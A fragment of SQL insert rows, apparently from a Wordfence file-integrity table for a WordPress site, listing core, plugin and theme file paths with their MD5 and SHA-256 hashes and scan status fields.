(0xf459b4aa528959692fb5b76c404858d3, 'wp-includes/js/media-grid.min.js', 1, 0x00000000000000000000000000000000, 0x33ce0803e0c8d668b8574f99c21502d6, 0xc5b9653f1048e6107e37d76f1eb93e7c4281e3d6340f1ff8d9bbe3513c144008, '', 0, '?'),
(0xf45acdeb961f51b521d5d0faf6ae2aa0, 'wp-content/plugins/wordfence/fonts/roboto-KFOkCnqEu92Fr1Mu51xGIzQXKMnyrYk.woff', 1, 0x00000000000000000000000000000000, 0x6079002378c473fa47ec4ab6d674b0e4, 0xdb41e172ebd0c4783f6a8e92018dd22387c20c43f546cb4f82472da253d6f724, '', 0, '?'),
(0xf45ead91fde04a9bfa98139b7584494b, 'wp-content/plugins/wordfence/js/jquery.tools.min.1579191227.js', 1, 0x00000000000000000000000000000000, 0xd13a0e2db7e10645d5a078a124e0b842, 0x2cb934d67e6154956c530c20816651034f0966f8d7e45405d3b5b7d63bc2dd29, '', 0, '?'),
(0xf4603079522758b117fe2e5b65aacdca, 'wp-content/plugins/Ultimate_VC_Addons/assets/css/fonts/ult-silk.svg', 0, 0xa97e1ea5aae192fa798ea0ad0e9557dc, 0xa97e1ea5aae192fa798ea0ad0e9557dc, 0x683a2e3fa30162be11713ed3abe3f390f6d617814c765a4092bc59b9234841a5, '', 0, '?'),
(0xf46bb0858b18010c3f773042a65c65f7, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_autorenew_24px.svg', 0, 0x1f8989cba180bca71195c270ef8a1c2c, 0x1f8989cba180bca71195c270ef8a1c2c, 0x37856d2e304a3fe6dc358afa7de44f4ea83a492be8848f230fa5c63866ab9dc7, '', 0, '?'),
(0xf47ea64cab5a231eecda9ed8386e65a8, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_4_bar_24px.svg', 0, 0xff4baa3adbf26732e5163f4269ad2456, 0xff4baa3adbf26732e5163f4269ad2456, 0x1bd4c02d9524e4310edaf2d73623fb7c4dfe08aa5bdf0df852f5244691772108, '', 0, '?'),
(0xf48d88373a9462fccb0d012cdd6a61f8, 'wp-includes/js/dist/blocks.min.js', 1, 0x00000000000000000000000000000000, 0xf022f4f2a3248b7ce50e01ccd46f660b, 0xe33481feb02182d0509d59e96c6fd4cb3b17bc8b73f878b55cdc27eb5ba8292f, '', 0, '?'),
(0xf495d3159eeb23b5dac0d9f17caad916, 'wp-content/plugins/js_composer/include/autoload/vendors/qtranslate.php', 0, 0x77dae41502b78059681f7944459bb5c7, 0x77dae41502b78059681f7944459bb5c7, 0x141257b66c3d39937ec7dab9806101b992f0da3ba1d55c0302858502f284d88b, '', 0, '?'),
(0xf4a57a5abb66c5cce869705e8932d78e, 'wp-includes/js/mediaelement/mediaelement.js', 1, 0x00000000000000000000000000000000, 0xcdfaf4cf4c18580773c4af4fb27ff253, 0x9d8c3a11f1b1bd5e35a65ba2f9f9df96c676d262936059fdf48ed8e9b618c669, '', 0, '?'),
(0xf4ad6ae5381dfa9cc8c48fc31aacb1f3, 'wp-includes/js/wp-backbone.js', 1, 0x00000000000000000000000000000000, 0xba62f36757662e2bb4585c05dedfd070, 0x0a5495f378b4f64e8740a3a8735fbe934c60cd452af864c00b80ed7f4894633f, '', 0, '?'),
(0xf4deb5987480ed5a17159f4aa19f24f0, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_call_end_24px.svg', 0, 0x8bc9afd67ed8095a76b3e73ca86181d0, 0x8bc9afd67ed8095a76b3e73ca86181d0, 0x45723c5e5f2f459e991ef8cb46e2a1363a5a6443d2a20dc4a6a672d0464977dc, '', 0, '?'),
(0xf4e2a185a3c151553cba39c9a974a313, 'wp-content/plugins/Ultimate_VC_Addons/assets/min-js/jparallax.min.js', 0, 0x46bb09e5109211798947f72912c431b9, 0x46bb09e5109211798947f72912c431b9, 0x3937ebe87543ac085561a89c7526472ee169f765c222b5fa87c4c90b69448482, '', 0, '?'),
(0xf4e8adacf25e6da8c0008e9b049f0904, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_array_24px.svg', 0, 0x0dbf80298d559c9d746b922a85592250, 0x0dbf80298d559c9d746b922a85592250, 0xf42e09ce1abc09f06612fa4aad73570f2e9545edbc0cf086cb1d9d54961661f8, '', 0, '?'),
(0xf4fa389e54c6fe290c5023322fc25ed3, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_add_box_24px.svg', 0, 0xa3b335d991540b3847b3eb0e8b0d7b18, 0xa3b335d991540b3847b3eb0e8b0d7b18, 0x57651e6709bcb6c1ec7d34b934f821bf45617ac4212fcb417601e3c53b3c6f7d, '', 0, '?'),
(0xf4fff6cfdf5da8523edc772e92451751, 'wp-includes/sodium_compat/src/Core/Curve25519/README.md', 1, 0x00000000000000000000000000000000, 0x1659a2aacf9bd1767f6a9fd70ac085cf, 0xe31553d30b7801965ef6563e6dd0212daa71ecf7ccf144d96556d1dfce06c8e8, '', 0, '?'),
(0xf50a780c9265c77baecc99e7b916998f, 'wp-content/plugins/Ultimate_VC_Addons/admin/vc_extend/js/chosen.js', 0, 0x85902b75289655e242fe1b71978b8a25, 0x85902b75289655e242fe1b71978b8a25, 0x62ef1486b035713df86bd70e173ac2526bd714c46caf36aba74b537e2872c5b8, '', 0, '?'),
(0xf50d80b4a98f2b20b8b5f91c2c9a150c, 'wp-content/plugins/wordfence/css/activity-report-widget.1579191227.css', 1, 0x00000000000000000000000000000000, 0x4a845e07783b7982ad82b0d463a1fdff, 0xd0d3a1aec166c5614d9a57762bf280a8579f1c257dd6ea9e6044f61f4ea317c5, '', 0, '?'),
(0xf51958be7f23380ceb4ca881a362fe64, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_connected_no_internet_2_26x24px.svg', 0, 0xb11eebee13aae2b73d23b852e035c131, 0xb11eebee13aae2b73d23b852e035c131, 0x94fae4bdb6510ce8b39a0dc9ad9850f2fd2edc4d1a485c98b7c9ad7c100956e6, '', 0, '?'),
(0xf521a5d6900f28794a6f2a12c8ee4ad8, 'wp-content/plugins/wordfence/vendor/composer/autoload_static.php', 1, 0x00000000000000000000000000000000, 0x8842b95c8f1742482b9712b181df2909, 0x89f638341f1945a83349362db896a3118739fcbcdf217a8c02c047139d4cba35, '', 0, '?'),
(0xf52371f8314564a28159620784a5b71c, 'wp-content/plugins/Ultimate_VC_Addons/admin/admin.php', 0, 0x168ffe6cb88a64e49842b806aa1634d2, 0x168ffe6cb88a64e49842b806aa1634d2, 0x6eb28c3fba3ff17c45325244b6dade3f5febb364186088425492c3088e51f2e9, '', 0, '?'),
(0xf52a2fc6d8bec7bb28bb13472d64173a, 'wp-content/plugins/Ultimate_VC_Addons/assets/min-js/image-separator.min.js', 0, 0x864c9bfe3de7743e4670ca8dc3eb9bbc, 0x864c9bfe3de7743e4670ca8dc3eb9bbc, 0x17fa8ba03fc38d8b9a6be7cef4fec2a2bc41839b0aa189ae2769f7479a9e1d2c, '', 0, '?'),
(0xf52af731b647e98dab76ed4cdf9f6e8c, 'wp-includes/sodium_compat/src/Compat.php', 1, 0x00000000000000000000000000000000, 0x1b6b27394c26db9441bbfa02906c962b, 0x3cd2e60505a3be87b08796771d57ee7211321e9b49b34d0e4f2b8660ba407501, '', 0, '?'),
(0xf52d227f44ed9dcacab944b23561d02f, 'wp-includes/cron.php', 1, 0x00000000000000000000000000000000, 0x3b8e61878ccccb05947524a4750c85b3, 0x8129d8347fd2b34198a3746b9b85654552948efb1f71c06228cfb6ee9a3f374a, '', 0, '?'),
(0xf541346508f8eac77bb95e9a8186d25a, 'wp-includes/js/wpdialog.js', 1, 0x00000000000000000000000000000000, 0xc6b779020a09eebd206570dcd4a90666, 0xd5c3212ff28e419f83661616d3303d938847d3378a68952f867555ef26678c9e, '', 0, '?'),
(0xf546a4eb1ac193e71eae43fcec31ae50, 'wp-content/plugins/wordfence/lib/wfDict.php', 1, 0x00000000000000000000000000000000, 0x79df204c07fceaef5a216245b1d46cda, 0x1c1181f314b5ca2e047b18304a65fa14c27bd7352dc6f2ec0b7e5b549a24c49e, '', 0, '?'),
(0xf54c6505fab2b0b5f9274aa25e165bd9, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/folder-private.svg', 0, 0x3858af70626ddaf7395b15203310053a, 0x3858af70626ddaf7395b15203310053a, 0x29cea21c764d1d979a118125a5e575aae7a145bec693ad6fd9a714e2afa72b52, '', 0, '?'),
(0xf575f481034e90e21d832e415fd95fcf, 'wp-includes/js/media-editor.js', 1, 0x00000000000000000000000000000000, 0x67730ca56853b59e34256a21239276ba, 0xece22932b8f1ec25663938e12c277694529035ffe49808dd8a4fe425d24453cd, '', 0, '?'),
(0xf5a285fe78660f9a5ee0a71a4fca05b1, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-qtranslate-x.php', 0, 0x6d91b39f146f94ee3843405ea73c0984, 0x6d91b39f146f94ee3843405ea73c0984, 0x0ddc06c398c17cc1f099d68071325397866dca7f499954407267dff5600064be, '', 0, '?'),
(0xf5a586c2d8de3e192b1bdc9e4c5bee6d, 'wp-includes/js/tinymce/skins/lightgray/img/anchor.gif', 1, 0x00000000000000000000000000000000, 0xabd3613571800fdcc891181d5f34f840, 0x2861666fd107d278d4449970615136d06d7f746be9bb19072cf9c8f30e565e1e, '', 0, '?'),
(0xf5a5dbfd28ebc5f8259e23803904796e, 'wp-admin/css/forms.css', 1, 0x00000000000000000000000000000000, 0x2497dbd6fa8ed7ec01aaa5cde5b41311, 0x47acb9c190b4d0bec198fa818ce953d7ed650cb434230d710bb946fa5ecedbef, '', 0, '?'),
(0xf5b213da12b84f0deeed4b14ac83eb37, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_phone_locked_24px.svg', 0, 0x1685731dd00d29e8d0c90cdf84825feb, 0x1685731dd00d29e8d0c90cdf84825feb, 0xf1e8ea241fec68007ab1fc48fe48e0094335ee8902b618260b631f79a7df3619, '', 0, '?'),
(0xf5b6ed1bf84432af6434e1a9c5641879, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_tta_section.php', 0, 0x3e7254d1a0f75a5bcd41e8918cbbb872, 0x3e7254d1a0f75a5bcd41e8918cbbb872, 0xc202f38286db1b6c00103baae4bb443dc3bddd16a42eacacd1d75a6348c0089f, '', 0, '?'),
(0xf5b744b0b5aa36ed53ff2fc86351823f, 'wp-includes/customize/class-wp-customize-background-position-control.php', 1, 0x00000000000000000000000000000000, 0xbf514a74221e18b8c22121845fe75e09, 0xd4eba69fec2fd4a4f96fb96b726f51ffab16a77c45aac25105e25add810d196f, '', 0, '?'),
(0xf5c27b5a0ac730440d4f8b4d2a5574da, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/GeoIp2Exception.php', 1, 0x00000000000000000000000000000000, 0xb14e09b853d258d93f7a0fd50e07b1d3, 0xe5bfe0e6d4a60a160edbd9b24c4be7941059a2958a31d325f95837d97ed22a11, '', 0, '?'),
(0xf5cc9d42b7258883eb4e10e66bebd218, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/note-paper.svg', 0, 0x53e436b5162537111d4725becf420196, 0x53e436b5162537111d4725becf420196, 0xe23116a555d278bae81ec37c9721e29f8fbe9edc6e8c8b9f3949db78d264543a, '', 0, '?'),
(0xf5d6e2c8275b37066a6ba0e5e7f549cb, 'wp-content/themes/Impreza/framework/js/us.core.js', 0, 0x72f441018d04632c663ccafd52a9e64f, 0x72f441018d04632c663ccafd52a9e64f, 0xa515f0775a4bebbd156d8ff83f7a1ef6f8ebb52835f71e30e69879255820f18f, '', 0, '?'),
(0xf5e2d13ee00b34f3a6943be04f2e520b, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_textdirection_r_to_l_24px.svg', 0, 0x8b5cc4cd1e86ed6083cfc9b1415b4642, 0x8b5cc4cd1e86ed6083cfc9b1415b4642, 0x8a7f1ef125bad7d194a216fefb766c220ca55940b47a04d09be0ddc0db678eed, '', 0, '?'),
(0xf5e5ebf14b1f1fd5568a45ac8514cbcd, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_text_format_24px.svg', 0, 0x67fdbc688eb711f7d2ac9f01b3ac0760, 0x67fdbc688eb711f7d2ac9f01b3ac0760, 0xb4be98f29fd33be8c2856e3b8105c88cf5a44a7962c4aa6268e2cfc5147dd42c, '', 0, '?'),
(0xf5e694f6d3e538f30821f60c020022c8, 'wp-content/themes/Impreza/framework/templates/form/captcha.php', 0, 0xeadfeecd377caff36f64a421dce2af60, 0xeadfeecd377caff36f64a421dce2af60, 0xf2e33108953e10636f9203297849c56f774c1d055c34d8f9e220e67af962f5f1, '', 0, '?'),
(0xf5e6d8f5a379a0f800ba0c22acee5105, 'wp-admin/user/menu.php', 1, 0x00000000000000000000000000000000, 0xc291386f76ca9b04c710342cabb61e08, 0x356b59c92328ded9cdf9dffdc4e9cdd4107ca2ecc2369f502da17e812893a9be, '', 0, '?'),
(0xf5ef424cb74ef3e899796af1b0e1723f, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/fish.svg', 0, 0xa64ececd0a4749906d9da29804d9e2b3, 0xa64ececd0a4749906d9da29804d9e2b3, 0x95518fd552fa3770f27d3df99b8643d2a3c7c77fdbb9b9388c58e7faebcb434e, '', 0, '?'),
(0xf5ff07c7991318b3f7841e50d422b9fe, 'wp-content/plugins/Ultimate_VC_Addons/admin/js/ultimate-vc-backend.min.js', 0, 0x31a518b28c365e8ce3fe2eda492c0fce, 0x31a518b28c365e8ce3fe2eda492c0fce, 0x619f46e2e39095e85ce26f9ffd2df08600487f401a8ef0461ced5aae8fe7be1d, '', 0, '?'),
(0xf5ffb610a06bd5b58bb5f4301d516f0f, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_1_bar_lock_24px.svg', 0, 0xd80b04e8ab73ce4db437102f24f8de06, 0xd80b04e8ab73ce4db437102f24f8de06, 0xf8ef5b8474b6efe0d197f21474199e8d9eb37793631d688c90b5dbf9a0c533f3, '', 0, '?'),
(0xf60b807ea191e4e215bbe27284439b9e, 'wp-admin/link-parse-opml.php', 1, 0x00000000000000000000000000000000, 0x814a8a1dbb098ee2b44683e01ae210f1, 0xd869ff3d731002dc10f2b590ea91dbbb66067bf44de8f86c9cabc767a99142c3, '', 0, '?'),
(0xf6146ad8e6b2055ab7133b0a6cd093bc, 'wp-includes/random_compat/random.php', 1, 0x00000000000000000000000000000000, 0x0fb535267d6bd2eb1fe9210c36bb2493, 0x583810b050a9f6d45f39f5feae6b51c5615be8e72d6d5327123c9140cc21563a, '', 0, '?'),
(0xf6189bcf01091914b24f5accaf719971, 'wp-content/plugins/js_composer/config/deprecated/shortcode-vc-accordion-tab.php', 0, 0xb6258d1d5526bb9ead867ac1fcfcdc23, 0xb6258d1d5526bb9ead867ac1fcfcdc23, 0x3e900eac7c6a13ce5478f4887102ebf50b36bc7f62e7e0c7c12900027811b141, '', 0, '?'),
(0xf638f58e15eb4167fe99a9159d786198, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_gitem_post_data.php', 0, 0x232d6563877ada88b94355fde3ce3b14, 0x232d6563877ada88b94355fde3ce3b14, 0x73b0253a0b8dcce88460492daa4e9d8b1e1bed9f3b3bd5b03ae9d2faf78d681a, '', 0, '?'),
(0xf6459aba9e31fa1f9e27f0274bc58095, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/smartphone-growth.svg', 0, 0xd3c4991e1abf39ffbbf19ce5a7544ffc, 0xd3c4991e1abf39ffbbf19ce5a7544ffc, 0x478173cf2a1f229f7b84c2558fabb5c882eb616e2aa743e9e363eaa41f8016fb, '', 0, '?'),
(0xf64b460a4ff269f17d2cedf6917701c7, 'wp-includes/random_compat/byte_safe_strings.php', 1, 0x00000000000000000000000000000000, 0xc45b101242d2a3c84adad48801c21b3b, 0x5db251ec80cb843d0750ddb575d008161551ec11c17b3ecf90139111b813f30c, '', 0, '?'),
(0xf652c7c93a1e538489a6d119cc9db187, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_location_on_24px.svg', 0, 0x49827d1919d49a5ea8d1deb5ca511a77, 0x49827d1919d49a5ea8d1deb5ca511a77, 0x5c5d3ae3b330b2c363f8b04137926bf6bfb154bea7e560aaa30ec60928fd9c00, '', 0, '?'),
(0xf65639b4d44bb1e1c4676f58b1b937d3, 'wp-admin/images/align-left-2x.png', 1, 0x00000000000000000000000000000000, 0x698538b14fb9839aecd01d5e97c66316, 0x246b62b63eb6e0ce0ccd18f16b269e3a09da8261ac37b916b65a63646d82b425, '', 0, '?'),
(0xf65cc24f0b1b1bfca309c9b8d38913ad, 'wp-content/plugins/Ultimate_VC_Addons/assets/min-js/SmoothScroll.min.js', 0, 0x8f0b5c011a0340444d17cc722856ed57, 0x8f0b5c011a0340444d17cc722856ed57, 0x89261539799cf28af91777feb3b3e1af27e9f46608141ae5e44bb51ff467d264, '', 0, '?'),
(0xf65cd724c12bc062a64d87ae3b166230, 'wp-content/themes/Impreza/framework/shortcodes/vc_column_text.php', 0, 0x238d711bdbc2b02dcc4ed28ee82de99f, 0x238d711bdbc2b02dcc4ed28ee82de99f, 0xf10b6766f2e0610eeb5f9e9b340d29cf48dcd5aa0dee479d4aecee44cca9621f, '', 0, '?'),
(0xf65f27fdf12683f0be3707eeb12cebe5, 'wp-content/plugins/revslider/includes/framework/em-integration.class.php', 0, 0xc6367b0e7fc18d021319ee7a5fbcb814, 0xc6367b0e7fc18d021319ee7a5fbcb814, 0x1998f074606f10a8629ee359afe5b8c5b7621fb1a42e80e16ea1c30220d4fb69, '', 0, '?'),
(0xf6638b15a9d3528e4e338a574f2ede1a, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_card_membership_24px.svg', 0, 0x07009967ef76f45cd43107be0fde7c7a, 0x07009967ef76f45cd43107be0fde7c7a, 0x4d72690f220bd91ba743f21c18a204d6894c9b625a609f8b8ac87cd667a39e26, '', 0, '?'),
(0xf66a13c69603331cf3044adcaace6c49, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_phonelink_setup_24px.svg', 0, 0x6535af0fdcb8909edcb7557cbfb64531, 0x6535af0fdcb8909edcb7557cbfb64531, 0x5e5adf759e972d9a113a22c9ff5d2358459653d721e04d4610095c1b8effea90, '', 0, '?'),
(0xf676562931ccc3c854d1b622084a4d19, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_create_24px.svg', 0, 0x39d530354818d7f8715ef914c2801afc, 0x39d530354818d7f8715ef914c2801afc, 0x8cf4107675023ba6e59bff1bd903e9d7814f3c4ba652ca60d6bdc9d3af9b247e, '', 0, '?'),
(0xf683d09e5da620eb776aa5ae647a4b6a, 'wp-content/plugins/js_composer/include/templates/params/vc_grid_item/attributes/post_categories.php', 0, 0x75998e6a137fd80205f86a97d0e86170, 0x75998e6a137fd80205f86a97d0e86170, 0xc14d88da5bcf95022fc4d695c8c14f2fc5513a671a3c0bbd604d4d0128968c99, '', 0, '?'),
(0xf6a8a392c2fe4814a953213bf820f396, 'wp-admin/js/user-profile.min.js', 1, 0x00000000000000000000000000000000, 0xb37c7bd0f42bb0a077cdb5b5c8e15ec1, 0x1af911d9ac02ffc80bb4bf4f09ca7957ceaa875b5907200ba95c4dc03a6e301c, '', 0, '?'),
(0xf6b2b37c36a0d5ab1a8696f24dd02570, 'wp-content/plugins/revslider/public/views/revslider-page-template.php', 0, 0xeefb01f09f5d337755d243afce8e104b, 0xeefb01f09f5d337755d243afce8e104b, 0xcba0fea5a7563cbc8673f27d90c962cfb1e255698d61da43bc7cd80023232413, '', 0, '?'),
(0xf6c7c1293760abc516a49c55d9c6a242, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_reply_24px.svg', 0, 0x084834c0882b6aa613eb1bca9bc1762a, 0x084834c0882b6aa613eb1bca9bc1762a, 0x8ed06b2fe54255b13ad7c412fe342128abb0302ea8301fd3e42a3c9d91c14502, '', 0, '?'),
(0xf6c840e67d9f7ea5344791763c82046d, 'wp-includes/sodium_compat/src/Core32/X25519.php', 1, 0x00000000000000000000000000000000, 0x67e9a562f1663e158e95ebbd3d99b2b7, 0xacbe939adfbad760cf1127b88b830ee79bb19308cdd096782369a7d4c523aa08, '', 0, '?'),
(0xf6ca76f26d872101ebd6f43da633e70c, 'wp-content/plugins/js_composer/assets/js/vendors/woocommerce-add-to-cart.js', 0, 0x787fe4f547a6cb7f4ce4934641085910, 0x787fe4f547a6cb7f4ce4934641085910, 0xc7d27bc9862bc291d58da98b0b72de812bb5c09583ae82ec1074c0f93c2b2490, '', 0, '?'),
(0xf6caed862ba202039ac771c97057a3c3, 'wp-includes/update.php', 1, 0x00000000000000000000000000000000, 0x5a8ccd49f8cd643e8a819ae90a708a94, 0xe4003db8b9fcc5522ad45044b054c4d2a3e83ebbcde2e690bd71fd88f23f8e78, '', 0, '?'),
(0xf6d3e3ad60d726583cc461519f56685c, 'wp-admin/user/profile.php', 1, 0x00000000000000000000000000000000, 0xb9fa17a9811195800079dda4b1262d03, 0x5bc0231442d9bddc66a68c5f4d1289bbc4fab9ade3219706506b9b3b1df6a4ca, '', 0, '?'),
(0xf6e6038263c33d2b444ac1950a434334, 'wp-content/themes/Impreza/framework/plugins-support/gravityforms.php', 0, 0xb390cbd978d43c05941dc1df8c5fcaf9, 0xb390cbd978d43c05941dc1df8c5fcaf9, 0xd43f02352a070eb7e0d20ad923b04082214783119a8d22dc072b8c45a267014a, '', 0, '?'),
(0xf6f59512f05b6d304ddb4598405160ba, 'wp-content/themes/Impreza/framework/config/widgets.php', 0, 0xfe566fc8ee69f5446cf27ee9244683d7, 0xfe566fc8ee69f5446cf27ee9244683d7, 0x269a4e93e5c0129388148fec48a252cd346f36c3d5a8dee15ee0ca2697bf3987, '', 0, '?'),
(0xf6fb05ed23bcbd1de2047bdd92101a85, 'wp-content/plugins/js_composer/assets/fonts/vc_icons_v2/fonts/vcpb-plugin-icons.svg', 0, 0x6818531a9017bc72e992d3d5468e5518, 0x6818531a9017bc72e992d3d5468e5518, 0x4aa8e9fa7249b7810b4528a96962a6508294724381bc81685d5dbe40b082b0ba, '', 0, '?'),
(0xf6fde58dc0501c712db374f3b9406cca, 'wp-includes/images/wlw/wp-icon.png', 1, 0x00000000000000000000000000000000, 0x311d098eca9a89370877334b1b8f992a, 0x02352014b7a17dec7828dad372dc3a612c7a6d4b8348317c2fe386d12bf2a9f1, '', 0, '?'),
(0xf700b4c04ef6af93a555e3c547b04a42, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_slideshow_24px.svg', 0, 0x24f52e64bd023c875da4494489744f94, 0x24f52e64bd023c875da4494489744f94, 0x334d5dd42774ed6203dbdfe7b91818bb9671682315a5450d5b131232f4554601, '', 0, '?'),
(0xf7019655cddc26288166cb2b39d3bdd8, 'wp-content/plugins/js_composer/assets/js/frontend_editor/vendors/plugins/jwplayer.js', 0, 0xba27eac5af64c6413f58ba11e3ec68eb, 0xba27eac5af64c6413f58ba11e3ec68eb, 0x2d57f3b1d856a0d1c8592eb2ab7e21af790228fe62dd6f5106976dfcb84ba680, '', 0, '?'),
(0xf70b8dae54529a31d46d11307eef8a8e, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_trending_flat_24px.svg', 0, 0x7b8e237324bcbed5c1fc63bc156d961f, 0x7b8e237324bcbed5c1fc63bc156d961f, 0x5729dd735a8fa24e64243b76d8f9d5a9076eba6e4088405a3ff17573c057e406, '', 0, '?'),
(0xf712b6166778834189c8a27da1670fa2, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XChaCha20.php', 1, 0x00000000000000000000000000000000, 0x7ab1496aaf9163a51959184b1143009c, 0xc5fd8850a683e6a0d6075256cf042a9513c4aa69f106bba38c7d6beaf75658f6, '', 0, '?'),
(0xf7185c71728caa9ddf4667987d3160b0, 'wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-meta.php', 0, 0xe6534da53c8b534e834b3ce7ec6c53dd, 0xe6534da53c8b534e834b3ce7ec6c53dd, 0xbfb6cddc75b8398692c83720b86b6f3e3f04ee11176d08843c876b5b338d8cb9, '', 0, '?'),
(0xf72040ef0e3b80fa182acfc17ca815b0, 'wp-includes/Text/Diff/Engine/string.php', 1, 0x00000000000000000000000000000000, 0x3a11b1933d17fc4da9c3000cacef6929, 0xc1a408e1c66499be5bab25ea876e1e5a1e52b9d7600cf3941b018db285e90bd0, '', 0, '?'),
(0xf72216a398df753bef4eec5e60d8a7a5, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_text_separator.php', 0, 0x5601c19002ecb4a4c6b8424853142a95, 0x5601c19002ecb4a4c6b8424853142a95, 0x1ff4e3734126e3b0859a25f6c65bffcf3a4084a5c701c553e0fd478ff60cdf63, '', 0, '?'),
(0xf72a661d7bfa4be372d192b57cd1b4d6, 'wp-content/plugins/js_composer/config/content/shortcode-vc-progress-bar.php', 0, 0xac9b2d9ae7980a4392a593114f93df77, 0xac9b2d9ae7980a4392a593114f93df77, 0x36130f4688fdb6237b845cbdb12bd8bcb1185f2c9c5b3ecbbb5c1c4d8482a95b, '', 0, '?'),
(0xf72e942be480f8489dbd92904c906860, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_24px.svg', 0, 0x9595a627654f16c62098eed8edb2b740, 0x9595a627654f16c62098eed8edb2b740, 0xf00875ced144c649e61f95d6469d21eb273e109cba41903f104f7fb547dac23c, '', 0, '?'),
(0xf77107c907590f94574372ad93696e88, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_call_24px.svg', 0, 0x3857464b453fda6d17b75402cc4476c0, 0x3857464b453fda6d17b75402cc4476c0, 0xe45431a5071178e70cec8d2ebccf17da177e638345f362d48f471e419feb9376, '', 0, '?'),
(0xf78d5d0715818d70dd529f2f24b831f6, 'wp-content/plugins/wordfence/views/common/page-fixed-tabbar.php', 1, 0x00000000000000000000000000000000, 0xf34d23c6822c886e9ac8cc6a397ba299, 0xc90ee9a42bc08f9e8813fb05bbd5c84e29c2a8b79b9ea8e58f4c094bac7af228, '', 0, '?'),
(0xf7a03e39a3a8f2cef3da45ff4f58dba5, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_forward_10_24px.svg', 0, 0xea6213f7436cea9f975e159c193c237b, 0xea6213f7436cea9f975e159c193c237b, 0xb0aa04994fba30fe858f0f23caaf5666383275a271b60b443a204e968e3e655c, '', 0, '?'),
(0xf7b1b657c7fd9a2a8a8c72a82539d655, 'wp-content/plugins/js_composer/include/autoload/vendors/cf7.php', 0, 0x965504efdfb45d4135bb999bada74309, 0x965504efdfb45d4135bb999bada74309, 0xbdb8706edd629ac1ac147377032a50ae6b3d7853a0a96a41a4342c8181de0651, '', 0, '?'),
(0xf7c61c5f77efc68c02e89bdf189ed00e, 'wp-includes/widgets/class-wp-widget-media-video.php', 1, 0x00000000000000000000000000000000, 0xa56e9df84fd39406a22edc8e318181dd, 0xd8ab5a05d7cc9502b2eae038a1a9513c62a96791d1da694f5ff69eda0cf974f4, '', 0, '?'),
(0xf8084b84e3a307fb0f0637b43903c6d7, 'wp-content/themes/Impreza/framework/config/shortcodes.php', 0, 0x89cc94b3cfea51d528d80a1894fd2571, 0x89cc94b3cfea51d528d80a1894fd2571, 0x584f2d08919151b241635ded6b8ff33239468ee478a20aa7bf1d52835fb18435, '', 0, '?'),
(0xf80ce44fa196e1a8fada5fbfbb6d811e, 'wp-content/plugins/js_composer/include/classes/deprecated/interfaces.php', 0, 0x0e71513fd04d6108f18865015fc7a449, 0x0e71513fd04d6108f18865015fc7a449, 0xf2a4dd0bba2d5ef15757dd1baccf1b38a3877d9441d18dbfe437699fba685b53, '', 0, '?'),
(0xf816757a4656f9caa59fcb72fd74606c, 'wp-content/plugins/js_composer/include/classes/core/class-vc-page.php', 0, 0x72d2d2361e310e7f4316e601f30838e2, 0x72d2d2361e310e7f4316e601f30838e2, 0xcbead0483b0b67221c47af8183444ea2faf1edf1c8467ff8cb2d565611e42b1a, '', 0, '?'),
(0xf81c2d7c56f1fb8ffb99c448db2584aa, 'wp-admin/site-health.php', 1, 0x00000000000000000000000000000000, 0x4ef0e0177030234463c380dfc8211d9b, 0xc1513639061b8e35b9bad37a5217a88917cc753921e6393a3db30de6814f547b, '', 0, '?'),
(0xf81ee8c7a2bd42d5b428d65c06bd304a, 'wp-includes/class-wp-text-diff-renderer-inline.php', 1, 0x00000000000000000000000000000000, 0xe8053813b36cb4b25f0deeb275ff8ca9, 0xb6f2d7a46d65f4fd2c96cd568484ebce39f3987d83d1e6f303097994bbed7697, '', 0, '?'),
(0xf82542153a658b7d169326ddfdebd5e2, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_unfold_more_36px.svg', 0, 0x317334dff1558dffa6ab57600b6a46a8, 0x317334dff1558dffa6ab57600b6a46a8, 0xe9368b141f9d703a93dc0e14c88bdc4e9fb8c624eb5922326b67c34d63210928, '', 0, '?'),
(0xf82e5d094737921a0826cbbd43a57f41, 'wp-content/themes/Impreza/framework/vendor/usof/js/usof.js', 0, 0x5776f8f39073c1eb1bb35c0bd2f52b2e, 0x5776f8f39073c1eb1bb35c0bd2f52b2e, 0x502675e4a4892c010d9e706d58ff058d20a0b810346c80c3ef42ab20285eacb8, '', 0, '?'),
(0xf8364e1b5d624eabed52f889849383c0, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/.gitmodules', 1, 0x00000000000000000000000000000000, 0xa1da842003e271f63f73319ab5d4e555, 0xe752456b6b73265d2169aa5f8ba49a8922fcc9feea90797e9cf817c1f94b6187, '', 0, '?'),
